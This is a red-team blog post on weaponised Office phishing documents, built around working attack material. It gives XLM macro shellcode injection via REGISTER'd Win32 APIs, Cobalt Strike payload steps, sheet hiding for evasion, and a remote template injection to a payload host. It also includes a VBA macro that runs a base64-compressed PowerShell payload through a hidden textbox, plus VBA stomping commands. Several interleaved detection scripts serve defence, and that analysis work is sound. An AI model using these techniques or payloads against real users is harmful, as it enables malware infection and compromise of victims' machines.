Phishing Documents, Revisited


I have written about phishing documents before; today I am adding another quick post, which I hope will be of some help.

1. XLM Macros (Excel 4.0)

Unlike ordinary Office documents, these use the XLM format, which is not the same thing as XML; XLM was created in 1992, well before VBA.

clipboard.png

Let's look at a simple demo:

clipboard 1.png

This technique was pointed out in 2018 in this article: https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

Many related projects grew out of it, for example Excel4-DCOM (https://github.com/outflanknl/Excel4-DCOM):

```powershell
Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
```

It, too, relies on XLM calling the Win32 API to achieve remote thread injection:

clipboard 2.png

SharpShooter: https://github.com/mdsecactivebreach/SharpShooter. Creating an XLS macro with this tool works as follows:

```shell
SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee
```

The generated SLK file looks like this:

clipboard 3.png

The principle is essentially the same. All of these are x86-based, however; x64 has some issues, which this article (https://www.cybereason.com/blog/excel4.0-macros-now-with-twice-the-bits) describes.

clipboard 4.png

The tool that eventually came out of this: https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a

That is, on x64 the injection is done with QueueUserAPC.

There are of course many other related tools (Macrome: https://github.com/michaelweber/Macrome, EXCELntDonut: https://github.com/FortyNorthSecurity/EXCELntDonut), and so on.

Process injection

Since XLS supports Win32 calls, process injection and similar operations become possible. The call form is as follows:

```vba
REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)
```

clipboard 5.png

Note that x86 and x64 must be handled differently. The x86 demo is as follows:

```vba
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=Valloc(0,65536,4096,64)
=SELECT(B1:B999,B1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"excel")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=CThread(0,0,A10,0,0,0)
=HALT()
```

The x64 demo is as follows:

```vba
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=WHILE(A22=0)
=SET.VALUE(A22,Valloc(A21,65536,12288,64))
=SET.VALUE(A21,A21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=SELECT(C1:C3479,C1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"EXCEL")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=Queue(A22,-2,0)
=Go()
=SET.VALUE(A22,0)
=HALT()
```

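To look at the REGISTER()/alias pattern from the detection side, here is an added example (my own code, not from this post or from any of the tools it links): a small XLM scanner that records the alias each REGISTER() call binds to a Win32 export and then resolves later `=Alias(...)` cells back to the underlying API, so an injection chain is reported even though names such as VirtualAlloc or CreateThread never appear in the calling cells. The sample formulas are the x86 demo's own lines; the API watchlist is an assumption.

```python
import re

# Win32 / NT exports whose registration from an Excel 4.0 macro sheet is a strong
# indicator of in-process or remote injection. The watchlist is an assumption.
INJECTION_APIS = {
    "virtualalloc", "virtualallocex", "writeprocessmemory", "createthread",
    "createremotethread", "rtlcopymemory", "queueuserapc", "nttestalert",
}

# =REGISTER("module","procedure","typestring","alias",...) ; only the first four
# string arguments matter for alias resolution.
REGISTER_RE = re.compile(
    r'^=REGISTER\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"',
    re.IGNORECASE,
)
# Leading function name of any other formula, e.g. =Valloc(...) or =SET.VALUE(...)
CALL_RE = re.compile(r"^=([A-Za-z_][A-Za-z0-9_.]*)\(")


def scan_xlm(formulas):
    """Return (alias_map, findings) for a list of XLM formula strings, one per cell."""
    aliases = {}    # alias (lower-case) -> (module, procedure, type string)
    findings = []
    for row, formula in enumerate(formulas, start=1):
        f = formula.strip()
        m = REGISTER_RE.match(f)
        if m:
            module, proc, typestr, alias = m.groups()
            aliases[alias.lower()] = (module, proc, typestr)
            if proc.lower() in INJECTION_APIS:
                findings.append({
                    "row": row, "kind": "register", "alias": alias,
                    "module": module, "proc": proc,
                    # first type-string char is the return type, the rest are parameters
                    "arg_count": max(len(typestr) - 1, 0), "formula": f,
                })
            continue
        c = CALL_RE.match(f)
        if c and c.group(1).lower() in aliases:
            module, proc, typestr = aliases[c.group(1).lower()]
            if proc.lower() in INJECTION_APIS:
                findings.append({
                    "row": row, "kind": "call", "alias": c.group(1),
                    "module": module, "proc": proc,
                    "arg_count": max(len(typestr) - 1, 0), "formula": f,
                })
    return aliases, findings


def injected_apis(findings):
    """Sorted, de-duplicated list of API names the macro registered and used."""
    return sorted({f["proc"] for f in findings})


# Constructed sample: a subset of the x86 demo above, one formula per cell.
SAMPLE_FORMULAS = [
    '=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)',
    '=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)',
    '=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)',
    '=Valloc(0,65536,4096,64)',
    '=SELECT(B1:B999,B1)',
    '=SET.VALUE(D1,0)',
    '=CThread(0,0,A10,0,0,0)',
    '=HALT()',
]

if __name__ == "__main__":
    alias_map, hits = scan_xlm(SAMPLE_FORMULAS)
    for h in hits:
        print(f"row {h['row']:>3} {h['kind']:<8} {h['alias']:<16} -> {h['module']}!{h['proc']}")
    print("APIs involved:", injected_apis(hits))
```

Extracting the formula cells themselves from a real workbook is a separate step (tools such as oletools' olevba or the XLMMacroDeobfuscator project do that); this scanner only covers the step that the alias trick is meant to defeat: mapping a harmless-looking alias back to the export it stands for.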
For convenience, I generate this directly with EXCELntDonut. Generate the shellcode with CS, then substitute it at the indicated location:

clipboard 6.png

Then run:

```shell
EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll
```

clipboard 7.png

Then insert the data and process it:

clipboard 8.png

clipboard 9.png

Then just execute it. Unfortunately, it kept failing when I tested it.

clipboard 10.png

Evasion

The effect is equivalent:

clipboard 11.png

Macro hiding (https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/b9ec509a-235d-424e-871d-f8e721106501):

clipboard 12.png

That is, change it to 02.

clipboard 13.png

Now the hidden sheet can no longer be shown:

clipboard 14.png
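The "02" edited above is the hsState field of the BoundSheet8 record in the Workbook stream (00 = visible, 01 = hidden, 02 = very hidden), which is why the sheet disappears from the Unhide dialog. As an added example (my own, not from the post), the following Python walks a BIFF record stream, decodes each BoundSheet8 record, and reports macro sheets that are hidden or very hidden. The record stream is constructed inline with a small builder; pulling the real Workbook stream out of an .xls OLE container is left to a library such as olefile (an assumption, not shown here).

```python
import struct

# MS-XLS record identifier and field codes (BoundSheet8: lbPlyPos, hsState, dt, stSheetName).
BOUNDSHEET8 = 0x0085
SHEET_STATE = {0x00: "visible", 0x01: "hidden", 0x02: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}


def iter_records(stream: bytes):
    """Yield (record_type, record_data) for a BIFF8 record stream (2-byte type, 2-byte length)."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, pos)
        pos += 4
        yield rtype, stream[pos:pos + rlen]
        pos += rlen


def parse_boundsheet8(data: bytes) -> dict:
    """Decode one BoundSheet8 record body."""
    lb_ply_pos, hs_state, dt = struct.unpack_from("<IBB", data, 0)
    cch, flags = data[6], data[7]                 # ShortXLUnicodeString header
    if flags & 0x01:                              # fHighByte set: UTF-16LE characters
        name = data[8:8 + 2 * cch].decode("utf-16-le")
    else:                                         # compressed 8-bit characters
        name = data[8:8 + cch].decode("latin-1")
    return {
        "name": name,
        "offset": lb_ply_pos,                     # position of the sheet's BOF in the stream
        "state": SHEET_STATE.get(hs_state & 0x03, "reserved"),
        "type": SHEET_TYPE.get(dt, f"unknown(0x{dt:02x})"),
    }


def list_sheets(stream: bytes) -> list:
    return [parse_boundsheet8(d) for t, d in iter_records(stream) if t == BOUNDSHEET8]


def find_hidden_macro_sheets(stream: bytes) -> list:
    """Macro sheets whose visibility was set to hidden (01) or very hidden (02)."""
    return [s for s in list_sheets(stream)
            if s["type"] == "macro sheet" and s["state"] != "visible"]


def build_boundsheet8(offset: int, hs_state: int, dt: int, name: str) -> bytes:
    """Constructed fixture: one BoundSheet8 record with an 8-bit sheet name."""
    raw = name.encode("latin-1")
    body = struct.pack("<IBB", offset, hs_state, dt) + bytes([len(raw), 0x00]) + raw
    return struct.pack("<HH", BOUNDSHEET8, len(body)) + body


# Constructed sample stream: a visible worksheet followed by a very hidden macro sheet.
SAMPLE_STREAM = (
    build_boundsheet8(0x0400, 0x00, 0x00, "Sheet1")
    + build_boundsheet8(0x0C00, 0x02, 0x01, "Macro1")
)

if __name__ == "__main__":
    for sheet in list_sheets(SAMPLE_STREAM):
        print(sheet)
    print("hidden macro sheets:", find_hidden_macro_sheets(SAMPLE_STREAM))
```

The check is deliberately on the raw record rather than on what Excel's UI shows, since the whole point of writing 02 is that the UI no longer offers the sheet for unhiding.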

EPPlus: EPPlus 5 - Excel spreadsheets for .NET

EPPlus is a .NET library for generating Excel files: https://github.com/EPPlusSoftware/EPPlus

With it you can produce a modified, AV-evading Excel file; demo: https://github.com/FortyNorthSecurity/hot-manchego

Usage:

```powershell
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs
hot-manchego.exe blank.xlsm vba.txt
```

Run the macro and a CS session comes in.

clipboard 15.png

2. PowerPoint

This attack instead relies on mouse actions as the trigger, such as a mouse click or mouse-over. The steps are as follows:

clipboard 16.png

Insert the HTA file generated by CS. On click,

clipboard 17.png

the CS session comes in.

3. Remotely loaded documents

Every document is a zip archive; extract it and edit:

clipboard 18.png

Change it to:

```xml
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>
```

clipboard 19.png

Now, when the document is opened and the macro runs, the session comes in.
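Because the remote template lives in a `.rels` part inside the zip, it is also easy to find without opening the document in Word. The following added example (my own code, not from the post) opens an OOXML package in memory, walks every `*.rels` part, and lists relationships with `TargetMode="External"`, rating a remote `attachedTemplate` (the technique above) higher than an ordinary hyperlink. The sample package is constructed inline with only the two `.rels` parts the check needs; the severity table and the hostname are assumptions.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types that make Office fetch and use the target when the document
# is opened; a remote target of one of these is the interesting case.
# (The table is an assumption, not something the post states.)
HIGH_RISK_TYPES = {"attachedTemplate", "oleObject", "subDocument", "frame"}
REMOTE_PREFIXES = ("http://", "https://", "file:", "\\\\", "//")


def find_external_relationships(doc_bytes: bytes) -> list:
    """Scan every .rels part of an OOXML package for externally targeted relationships."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for part in zf.namelist():
            if not part.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue                       # internal parts are not a loader
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                remote = target.lower().startswith(REMOTE_PREFIXES)
                findings.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "type": rel_type,
                    "target": target,
                    "severity": "high" if remote and rel_type in HIGH_RISK_TYPES else "low",
                })
    return findings


def build_sample_docx() -> bytes:
    """Constructed minimal package: a settings.xml.rels with a remote template and
    a document.xml.rels with one internal and one hyperlink relationship."""
    rels_open = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                 '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
    base = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    settings_rels = (rels_open
        + f'<Relationship Id="rId1" Type="{base}attachedTemplate" '
          'Target="http://template.example/remote.dotm" TargetMode="External"/>'
        + '</Relationships>')
    document_rels = (rels_open
        + f'<Relationship Id="rId1" Type="{base}styles" Target="styles.xml"/>'
        + f'<Relationship Id="rId2" Type="{base}hyperlink" '
          'Target="https://www.example.org/" TargetMode="External"/>'
        + '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for f in find_external_relationships(build_sample_docx()):
        print(f"{f['severity']:<4} {f['part']:<32} {f['id']} {f['type']} -> {f['target']}")
```

The same function works unchanged on a real `.docx`/`.dotm` read from disk, since it only depends on the zip layout and the package relationships namespace.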

4. Controls

```vba
Sub Main()
On Error Resume Next
createTextBoxs
ExecuteTextBoxCommands
End Sub

Sub createTextBoxs()
On Error Resume Next
Dim objTextBox As Shape
Dim secretkey As Long
Dim str As String
Dim zHf As String
Dim payload As String

payload = "H4sIAAAAAAAAAK1WaW/iShb9nPwKf4gEKCQBs4U3ivQAYzDGxmA2kxdFZbuAMuWtvGDzpv/7lA2k09PpmZZmkJCr7LucOnepq8Lw"
payload = payload + "QQ0JMkLJNSHzsIQkQK7DsLe328gxwmydLd53MHz3iGu8A9MkMAiYv29vFECAzRTvYkDebdeMMCwz+SYThGZEYOnm5vYmfxU5AdjC"
payload = payload + "dweEKIbvNgz3rhkwL0zxteN5nGsD5Lz98UcvIgQ64Xn/OIBhJwigrWMEg2KJ+Sez2kMCHya6BY2Q+Zu5e38cYFcH+CKW9oCxp6fo"
payload = payload + "OGb2bewaIDvBo+phFBYLf/1VKL0+VN8e+34EcFAsqGkQQvvRxLhQYr6VMofz1IPFgoQM4gbuNnxcIafGPi5y9HIOXjpjL5QuJ9t5"
payload = payload + "gJ7j14fMrJ51igW6VCg3nTOHhTLzmvl7fXtj/vxAM4ucENnwUXBCSFxPhSRGBgweh8AxMZzBLVUrBDRmzq5QoiAIDCPiMFcsVC92"
payload = payload + "D7B450QYl6nd19+1+1aU4fFK7u8qFT8rUSklJKXyJSd+hw4pz5uzOXqcn9B/Sq4S/f2UYKXbb1+lqgkx3IEQvoeU30+5entz85ov"
payload = payload + "IT1PUXEDlOu9MJUyI1EQIHRJmoVzTiJYevsen7Pbq2ZQ/qWh6lXronMOzxnHC/O6dJH5dntTur1kT/b+XY8QNiHJvv+6Gji4RQ7k"
payload = payload + "UgfYyLgmfPGrmMEthjkfj1cxmeIsFi4foMld2ClkhL7+rNa3Ufih2z2D6xg07gFFRVOi9COYcwyLBcGRoE35O+9pmt5taZnBq/Sl"
payload = payload + "tNKr92yf5XIPgyAoM0pE69woMyoEGJplpuME6PKpE4Vuvix8hytFOEQGCMKrubfSF5ReXPdch1ZMZNDoUhrmqgcNBHDGSpkZIhN2"
payload = payload + "UxXtrhAKX3LSAxjTkqOWYhoT+ibjQg2znCFm+d/zo/SowlCwPQxtKp13IR6DHe05l4rK0w3soFn4D7CvdXIuioyrK0mfQNMEULEb"
payload = payload + "lpklIiHta4XyT4n3v8H7scX8ALNH4CWQxbwQhS1t6OcuQNkJ0Ik2Y+gzz6WsBF+7aZjVUm7GyK6blw+ic1pJSJV44tpdEMBmXc17"
payload = payload + "XLFQY6Nd0lbGzVSyBHaUao6cGM6S9GN+AJr7ZMpGrjEPiT/sc3Q/M9ggwAPs6fuxD5KxZSXt3jrtKx12jJqogYRo3D05PDJsqjed"
payload = payload + "uNqsTYRY5l0ctMQev1oAZPm5r8iuV80+SMcno7knExa62lH2hVjpmKvYaNqiyzdDqruM+pFH+tFE0aKxP7YFVN/H3DIcxcLgeSiy"
payload = payload + "GnjGegvm+qaf+dL8XQyy/amd7ZHfgyTzo1H2Ya3ahKtRS3M8BFfR7nSUkWGeOMiO6PvIlQwvqMknY3s4WMCrLtRDVZwvNmvKTRX4"
payload = payload + "hNebRNU8HC87i0NN2ZAcW8xTjHKGExns6KR5h4259Ps1RRcWQ0z8aITsp2kqpBcZe5Sqapc+xY0p+s8N88SmQ68OmgRRThPqp5Xx"
payload = payload + "aywCS1hNHGPNI9vYs9zMMtp25Dco7vpQHonrhPjhiPgx9hsTxchw53qZ/LSOJ1Uq7+vWWAT3ApIs0D4FYxHG2TpVODFJBUt4jrqZ"
payload = payload + "HjdIsL48WF61Dpsjh8XTNteWoCfaUjxTm7Mu6K6T+27aHyxUMx0kHW4trp86+nbnBq2DI3X1eijMOi2LsLzJpz01RYcnvD7E7Hij"
payload = payload + "zPGgsmhMogrkYCqzi/5mxtmj/uxQXQ+mcjTnsTivtHtcV5P7R2k87SeTRWW0Vg+8MtvvON3p+pudBLiZpHVqMxoPU1ryHU5fGxw/"
payload = payload + "raiDjlxbLLxhZu9sw41EVe6tZ5u+IE3WvV2j20Lb0xPeWa1D41CVN+0F2R21mWDp3hYE7BE1gHrfirzOXN427bm7ZTdNQYOVJQSg"
payload = payload + "eqqAlup3dhOzJ676+/V4IdaaRnP69BwYadVSWEGdP8faUF7K4ux5GRw30ugETZ+7r7DcWtr5glLbhEHYqlYPykwTLHmkVO6TrZxU"
payload = payload + "HWEyu190h9I8iWuidtQAqVQr3LY+8AbcsO1BzK0XVb/fdNd7rr6vI3u8DFvjCm0fdrNXc+yFtnna1FyV666D8XxUG+0loOimtrfm"
payload = payload + "aNDg96fB0FdOvUa9Fh/1+kpqrCSho1U7w+kgGdvyuj4YidOBYGlebY5dvnrOaX9Dc5XWqKgLp6xWRaDlNStuYN08JuGJBa3u0RhE"
payload = payload + "fkL/FZqT9ysqe8xkfJ+leS3pK/9I8xo0OafT1K1lY8n7vRkRoh6te70Ca2ELpJolULvGPTeO5ZZR6wqgT+PJzwK5v6uo/WRhGcg3"
payload = payload + "5ruXl7xVbl1Cp58kmyj+wdDnAw6Zj4ZH2xxtr9n7+/u8Jd58fHq9S96uY+TH/kFPqLla4/bm23VeiMGnrvmr6UwCJNgDTLspnbCu"
payload = payload + "9yPvEv4yJykuyjSKxa9H+wMkDsR07KWD8fVW6WDsGtlk94sR68+Pvk9vzwVd1tgvV6XvF0SpdL369Gi7zcefyxGvU+D3q2RDz1f+"
payload = payload + "ROQYOrtwX2YqSa1SqWTPeoVa+31ieq6XFj/slbP57xOUz65w7upjYCORY8P/Ywx+8Prf2c34y2fI7+zliL6mLLuU/wU5qB694w0A"
payload = payload + "AA=="

zHf = " -NoP -NonI -Command ""Invoke-"
zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"
zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"
zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"
zHf = zHf + "(\"" " & payload & " \"" )))), [IO.Compression.Compr"
zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
zHf = zHf + "I)).ReadToEnd();Read-Host;"""

secretkey = RGB(1, 33, 7)
Debug.Print "Adding Embedded Command Shape Into Document"
Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)
With objTextBox
.TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1"
.Name = "Shell.Application"
.Height = 1
.Width = 1
.Visible = msoFalse
.Shadow.Visible = True
.Shadow.ForeColor.RGB = secretkey
If .Shadow.ForeColor.RGB <> secretkey Then
Debug.Print "Fail to set secret key"
End If
Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB)
.AlternativeText = "ShellExecute"
.TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColor
End With
End Sub

Sub ExecuteTextBoxCommands()
On Error Resume Next
Dim objCmdShape As Shape
Dim secretkey As Long
Dim cmdParams() As String
Dim cmdCommand As String
Dim cmdType As String
Dim cmdObj As Object
secretkey = RGB(1, 33, 7)
For x = 1 To ActiveDocument.Shapes.Count
Set objCmdShape = ActiveDocument.Shapes(x)
If objCmdShape.Shadow.ForeColor.RGB = secretkey Then
Debug.Print "Discovered Command Text Object"
cmdType = objCmdShape.Name
cmdCommand = objCmdShape.AlternativeText
cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|")
Debug.Print "Command Type To Execute: " & cmdType
Debug.Print "Command To Execute: " & cmdCommand
Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ")
Set cmdObj = Interaction.CreateObject(cmdType)
VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2)
objCmdShape.Delete
ActiveDocument.Save
Exit For
End If
Next
End Sub
```

There is nothing magical about this technique: a macro creates an invisible control, then invokes it to execute malicious code. The code above cannot be used as-is; the PowerShell part needs to be changed, which I leave to readers to complete themselves.

5. VBA Stomping

Translated literally, "VBA stomping". How should we understand it? Suppose we create a basic piece of VBA code:

clipboard 20.png

When we extract the document and fill the source with zeros, it still executes, like this:

clipboard 21.png

Change it to:

clipboard 22.png

It still works at this point.

Weaponized: https://github.com/outflanknl/EvilClippy

Build command:

```powershell
csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs
```

clipboard 23.png

Usage:

```powershell
EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc
```

This gives you a processed document.
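Stomping works because a module stream carries the compiled p-code first and the compressed source text only from MODULEOFFSET onward, and Office runs the p-code when its version matches the one that compiled it. The zero-filled variant shown above is therefore visible from the source side: the p-code region is intact while the decompressed source is blank. The following added example (my own code, not from the post or from EvilClippy) implements the MS-OVBA decompression used for module source, plus a literal-only compressor to build fixtures, and applies a heuristic that reports modules with a non-empty p-code region but blank or procedure-less source. MODULEOFFSET is assumed to be known from the `dir` stream, and the p-code bytes in the fixtures are constructed filler.

```python
import re


def decompress_vba(data: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer (signature byte 0x01)."""
    if not data or data[0] != 0x01:
        raise ValueError("not an MS-OVBA compressed container")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        pos += 2
        chunk_end = pos + (header & 0x0FFF) + 1      # size field is chunk size - 3
        chunk_start = len(out)
        if not header & 0x8000:                      # flag clear: chunk stored raw
            out += data[pos:chunk_end]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags = data[pos]                        # one flag bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not flags & (1 << bit):           # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token = int.from_bytes(data[pos:pos + 2], "little")
                pos += 2
                diff = len(out) - chunk_start        # bytes decoded so far in this chunk
                bit_count = max(4, (diff - 1).bit_length())   # ceil(log2(diff)), min 4
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                for _ in range(length):              # overlapping copy, byte by byte
                    out.append(out[-offset])
    return bytes(out)


def compress_literal(src: bytes) -> bytes:
    """Valid MS-OVBA container using literal tokens only (fixture builder, not a real compressor)."""
    out = bytearray(b"\x01")
    for i in range(0, len(src), 3640):               # 3640 bytes + 455 flag bytes fits a chunk
        chunk, body = src[i:i + 3640], bytearray()
        for j in range(0, len(chunk), 8):
            body.append(0x00)                        # flag byte: next 8 tokens are literals
            body += chunk[j:j + 8]
        out += (0xB000 | (len(body) - 1)).to_bytes(2, "little") + body
    return bytes(out)


PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+|Friend\s+)?(?:Static\s+)?(?:Sub|Function|Property)\b",
                     re.IGNORECASE | re.MULTILINE)


def analyze_module(stream: bytes, module_offset: int) -> dict:
    """Heuristic stomping check: intact p-code with blank or procedure-less source."""
    pcode = stream[:module_offset]
    source = decompress_vba(stream[module_offset:]).decode("latin-1")
    blank = not source.strip(" \t\r\n\x00")
    has_proc = PROC_RE.search(source) is not None
    return {
        "pcode_bytes": len(pcode),
        "source_bytes": len(source),
        "blank_source": blank,
        "has_procedure": has_proc,
        "suspected_stomping": len(pcode) > 0 and (blank or not has_proc),
    }


# Constructed fixtures: 300 bytes of filler standing in for the p-code region.
GOOD_SOURCE = b'Attribute VB_Name = "Module1"\r\nSub Main()\r\nEnd Sub\r\n'
GOOD_MODULE = b"\x00" * 300 + compress_literal(GOOD_SOURCE)
STOMPED_MODULE = b"\x00" * 300 + compress_literal(b"\x00" * len(GOOD_SOURCE))

if __name__ == "__main__":
    print("normal :", analyze_module(GOOD_MODULE, 300))
    print("stomped:", analyze_module(STOMPED_MODULE, 300))
```

The heuristic only catches the blanked-source case; EvilClippy's `-s fakecode.vba` leaves plausible source in place, so the reliable check there is to disassemble the p-code (pcodedmp does this) and compare it with the source, or to confirm that the `_VBA_PROJECT` version bytes match the Office build the document claims to target.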

Summary

The above covered a few common phishing-document techniques; I hope they are useful. Used in combination, the effect is even better.